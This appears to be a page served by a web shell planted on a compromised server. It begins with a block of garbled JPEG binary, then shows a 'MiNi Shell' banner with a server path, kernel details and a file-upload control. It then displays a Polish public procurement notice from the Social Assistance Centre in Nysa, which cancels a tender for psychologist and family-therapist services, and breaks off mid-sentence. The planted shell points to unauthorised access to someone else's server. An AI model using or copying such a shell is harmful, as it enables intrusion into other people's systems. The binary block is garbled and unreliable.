JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210712/0011063102-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00110631 z dnia 2021-07-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> UNIEWAŻNIENIE POSTĘPOWANIA - wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej w Nysie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004501963</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Komisji Edukacji Narodowej 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nysa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">48-303</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774472370</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774336746</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">opsnysa@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ops-nysa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> UNIEWAŻNIENIE POSTĘPOWANIA - wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eaad99a9-e090-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00110631</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Bliżej rodziny i dziecka wsparcie rodzin przeżywających problemy opiekuńczo – wychowawcze oraz wsparcie pieczy zastępczej – III edycja” Regionalnego Programu Operacyjnego Województwa Opolskiego 2014 – 2020 (RPO WO). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ops-nysa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu:<br/>1)	miniPortalu https://miniportal.uzp.gov.pl/,<br/>2)	poczty elektronicznej k.kaminska@ops-nysa.pl <br/>z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniPortalu.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>Ofertę, składa się, pod rygorem nieważności:<br/>1)	w formie elektronicznej (podpisanej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym e-dowodem. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert):<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż wskazanych, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie, za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły podano w dokumentach zamówienia SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły podano w dokumentach zamówienia SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: Świadczenie usług psychologa dziecięcego<br/>Nazwa zamówienia: Wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka - wsparcie rodzin przeżywających problemy opiekuńczo – wychowawcze oraz wsparcie pieczy zastępczej – III edycja” Regionalnego Programu Operacyjnego Województwa Opolskiego 2014 – 2020 (RPO WO), Osi priorytetowej VIII Integracja społeczna dla Działania 8.1 Dostęp do wysokiej jakości usług zdrowotnych i społecznych w zakresie wspierania rodziny i pieczy zastępczej. Zadania w w/w projekcie świadczone przez psychologa dziecięcego:<br/>1.	Diagnozowanie zaburzeń lękowych, zachowania, snu, odżywiania, nastroju jak również terapia wynikająca z indywidualnych potrzeb uczestników.<br/>2.	Wspomaganie rozwoju dzieci i młodzieży.<br/>3.	Specjalistyczne poradnictwo i konsultacje.<br/>4.	Prowadzenie ww. działań w formie indywidualnej i/lub grupowej, stacjonarnej i/lub mobilniej (tj. w miejscu zamieszkania uczestnika/ów) w zależności od potrzeb uczestników.<br/>5.	Dopuszcza się możliwość realizacji usług on–line w wypadku wprowadzenie ograniczeń spowodowanych sytuacją epidemiologiczną w kraju.<br/>6.	Dokumentowanie ww. działań zgodnie z wymaganiami zamawiającego<br/>7.	Współpraca z koordynatorem projektu.<br/>8.	Współpraca z innymi specjalistami realizującymi projekt pn. „Bliżej rodziny i dziecka – wsparcie rodzin przeżywających problemy opiekuńczo-wychowawcze oraz wsparcie pieczy zastępczej – III edycja” oraz z pracownikami Ośrodka Pomocy Społecznej w Nysie.<br/><br/>Czas trwania: 12 godzin średniomiesięcznie/ przez okres 24 miesięcy, łącznie 378 godzin. <br/>Specjalistyczne poradnictwo i konsultacje odbywać się będą przynajmniej raz w tygodniu. <br/><br/>Miejsce świadczenia usługi: Klub Rodzica w Gminnym Centrum Wsparcia III Sektora ul. Kornela Ujejskiego 25, 48-300 Nysa i/lub mobilnie w miejscu zamieszkania uczestnika i/lub on-line. Usługa świadczona będzie w godzinach pracy Klubu Rodzica tj. od 7:00 do 19:00 z wyłączeniem dni wolnych od pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena” ocena zostanie dokonana przy zastosowaniu wzoru:<br/><br/> Najniższa cena brutto <br/>spośród złożonych ofert<br/>Ilość punktów = ¬ x 60 pkt.<br/>Cena badanej oferty brutto <br/><br/>Dla części nr 1<br/>Doświadczenie w pracy o charakterze psychologa dziecięcego zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania<br/>w badanej ofercie<br/>Liczba punktów = --------------------------------------------------------------------- x 40 pkt.<br/>	Największe wykazane doświadczenie w pracy o charakterze psychologa dziecięcego zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania<br/><br/>a)	Doświadczenie osób ubiegających się o świadczenie usług psychologa dziecięcego w kryterium oceny ofert weryfikowane będzie na podstawie informacji zawartych w formularzu oferty (załącznik nr 1 do SWZ) odpowiednio do części.<br/>b)	W kryterium doświadczenie osób ubiegających się o świadczenie usług psychologa dziecięcego punktowane będzie minimum 3 letnie doświadczenie w pracy o charakterze psychologa dziecięcego zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania.<br/>c)	Wykazanie mniejszego doświadczenia niż 3 lata i mniej dla danej osoby oznacza 0 pkt.<br/>d)	Maksymalną ilość punktów w tym kryterium otrzyma Wykonawca, który wykaże, największą łączną ilość lat doświadczenia dla jednej osoby w pracy o charakterze psychologa dziecięcego lub (średnia arytmetyczna) osób z minimum 3 letnim doświadczeniem w pracy <br/>w o charakterze psychologa. <br/>e)	Do obliczenia punktacji zostanie obliczona średnia arytmetyczna doświadczenia osób wskazanych w wykazie osób w ofercie. <br/>f)	W przypadku gdy chociaż w jednej ofercie, doświadczenie wykazanej osoby/osób zostanie podane w miesiącach doświadczenie wszystkich osób (specjalistów) w pozostałych ofertach również zostanie przeliczone na miesiące. 1 rok=12 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Świadczenie usług psychologa/psychoterapeuty<br/>Nazwa zamówienia: Wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka - wsparcie rodzin przeżywających problemy opiekuńczo – wychwawcze oraz wsparcie pieczy zastępczej – III edycja” Regionalnego Programu Operacyjnego Województwa Opolskiego 2014 – 2020 (RPO WO), Osi priorytetowej VIII Integracja społeczna dla Działania 8.1 Dostęp do wysokiej jakości usług zdrowotnych i społecznych w zakresie wspierania rodziny i pieczy zastępczej.<br/>Zadania w w/w projekcie świadczone przez psychologa/psychoterapeutę:<br/>1.	Poradnictwo psychologiczne, konsultacje w tym wspieranie wychowawcze funkcji rodziny, pomoc psychologiczno-pedagogiczna, indywidualnie lub grupowo w zależności od indywidualnych potrzeb uczestników, w formie stacjonarnej i/lub mobilnej (tj. w miejscu zamieszkania uczestnika) w zależności od potrzeb uczestników. <br/>2.	Dopuszcza się możliwość realizacji usług on–line w wypadku wprowadzenie ograniczeń spowodowanych sytuacją epidemiologiczną w kraju.<br/>3.	Prowadzenie terapii zaburzeń rozwojowych i dysfunkcyjnych.<br/>4.	Specjalistyczne poradnictwo i konsultacje.<br/>5.	Dokumentowanie przeprowadzonych porad zgodnie z wymaganiami zamawiającego.<br/>6.	Współpraca z koordynatorem projektu.<br/>7.	Współpraca z innymi specjalistami realizującymi projekt pn. „Bliżej rodziny i dziecka – wsparcie rodzin przeżywających problemy opiekuńczo-wychowawcze oraz wsparcie pieczy zastępczej – III edycja” oraz z pracownikami Ośrodka Pomocy Społecznej w Nysie.<br/><br/><br/><br/>Czas trwania: - 10 godzin średniomiesięcznie/ przez okres 24 miesięcy, łącznie 313 godzin.<br/>Specjalistyczne poradnictwo i konsultacje odbywać się będą przynajmniej raz w tygodniu. <br/>	<br/>Miejsce świadczenia usługi: Klub Rodzica w Gminnym Centrum Wsparcia III Sektora ul. Kornela Ujejskiego 25, 48-300 Nysa i/lub mobilnie w miejscu zamieszkania uczestnika i/lub on-line. Usługa świadczona będzie w godzinach pracy Klubu Rodzica tj. od 7:00 do 19:00 z wyłączeniem dni wolnych od pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena” ocena zostanie dokonana przy zastosowaniu wzoru:<br/><br/> Najniższa cena brutto <br/>spośród złożonych ofert<br/>Ilość punktów = ¬ x 60 pkt.<br/>Cena badanej oferty brutto <br/>Doświadczenie w pracy o charakterze psychoterapeuty i/lub psychologa zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania <br/>w badanej ofercie<br/>Liczba punktów = --------------------------------------------------------------------- x 40 pkt.<br/>	Największe wykazane doświadczenie osób w pracy o charakterze psychoterapeuty i/lub psychologa zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania<br/><br/>a)	Doświadczenie osób ubiegających się o świadczenie usług psychologa/psychoterapeuty <br/>w kryterium oceny ofert weryfikowane będzie na podstawie informacji zawartych <br/>w formularzu oferty (załącznik nr 1 do SWZ) odpowiednio do części.<br/>b)	W kryterium doświadczenie osób ubiegających się o świadczenie usług psychologa/psychoterapeuty punktowane będzie minimum 2 letnie doświadczenie w pracy <br/>o charakterze psychologa/psychoterapeuty w okresie ostatnich 5 latach przed dniem wszczęcia postępowania. <br/>c)	Wykazanie mniejszego doświadczenia niż 2 lata i mniej dla danej osoby oznacza 0 pkt.<br/>d)	Maksymalną ilość punktów w tym kryterium otrzyma Wykonawca, który wykaże, największą łączną ilość lat doświadczenia dla jednej osoby w pracy o charakterze psychologa/psychoterapeutę lub (średnia arytmetyczna) osób z minimum 2 letnim doświadczeniem w pracy w o charakterze psychologa/psychoterapeuty.<br/>e)	Do obliczenia punktacji zostanie obliczona średnia arytmetyczna doświadczenia osób wskazanych w wykazie osób w ofercie. <br/>f)	W przypadku gdy chociaż w jednej ofercie, doświadczenie wykazanej osoby/osób zostanie podane w miesiącach doświadczenie wszystkich osób (specjalistów) w pozostałych ofertach również zostanie przeliczone na miesiące. 1 rok=12 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3: Świadczenie usług terapeuty rodzin/pedagoga<br/>Nazwa zamówienia: Wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka - wsparcie rodzin przeżywających problemy opiekuńczo – wychowawcze oraz wsparcie pieczy zastępczej – III edycja” Regionalnego Programu Operacyjnego Województwa Opolskiego 2014 – 2020 (RPO WO), Osi priorytetowej VIII Integracja społeczna dla Działania 8.1 Dostęp do wysokiej jakości usług zdrowotnych i społecznych w zakresie wspierania rodziny i pieczy zastępczej. Zadania w w/w projekcie świadczone przez terapeutę rodzin/pedagoga:<br/>1.	Przeprowadzenie warsztatów z zakresu zwiększenia świadomości wychowawczej rodziców, rozwoju umiejętności stosowania metod i środków wychowawczych.<br/>2.	Przeprowadzenie terapii zajęciowej. <br/>3.	Prowadzenie ww. działań w formie indywidualnej i/lub grupowej, stacjonarnej i/lub mobilniej (tj. w miejscu zamieszkania uczestnika/ów) w zależności od potrzeb uczestników.<br/>4.	Dopuszcza się możliwość realizacji usług on–line w wypadku wprowadzenie ograniczeń spowodowanych sytuacją epidemiologiczną w kraju.<br/>5.	Dokumentowanie ww. działań zgodnie z wymaganiami zamawiającego<br/>6.	Współpraca z koordynatorem projektu.<br/>7.	Współpraca z innymi specjalistami realizującymi projekt pn. „Bliżej rodziny i dziecka – wsparcie rodzin przeżywających problemy opiekuńczo-wychowawcze oraz wsparcie pieczy zastępczej – III edycja” oraz z pracownikami Ośrodka Pomocy Społecznej w Nysie.<br/><br/><br/>Czas trwania: 10 godzin średniomiesięcznie/ przez okres 24 miesięcy, łącznie 300 godzin.<br/>Specjalistyczne poradnictwo i konsultacje odbywać się będą przynajmniej raz w tygodniu. <br/>	<br/>Miejsce świadczenia usługi: Klub Rodzica w Gminnym Centrum Wsparcia III Sektora ul. Kornela Ujejskiego 25, 48-300 Nysa i/lub mobilnie w miejscu zamieszkania uczestnika i/lub on-line. Usługa świadczona będzie w godzinach pracy Klubu Rodzica tj. od 7:00 do 19:00 z wyłączeniem dni wolnych od pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena” ocena zostanie dokonana przy zastosowaniu wzoru:<br/><br/> Najniższa cena brutto <br/>spośród złożonych ofert<br/>Ilość punktów = ¬ x 60 pkt.<br/>Cena badanej oferty brutto <br/>Dla części nr 3<br/>	Doświadczenie w pracy o charakterze pedagoga rodzinnego/terapeutę rodzin zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania <br/>w badanej ofercie<br/>Liczba punktów = --------------------------------------------------------------------- x 40 pkt.<br/>	Największe wykazane doświadczenie osób w pracy o charakterze 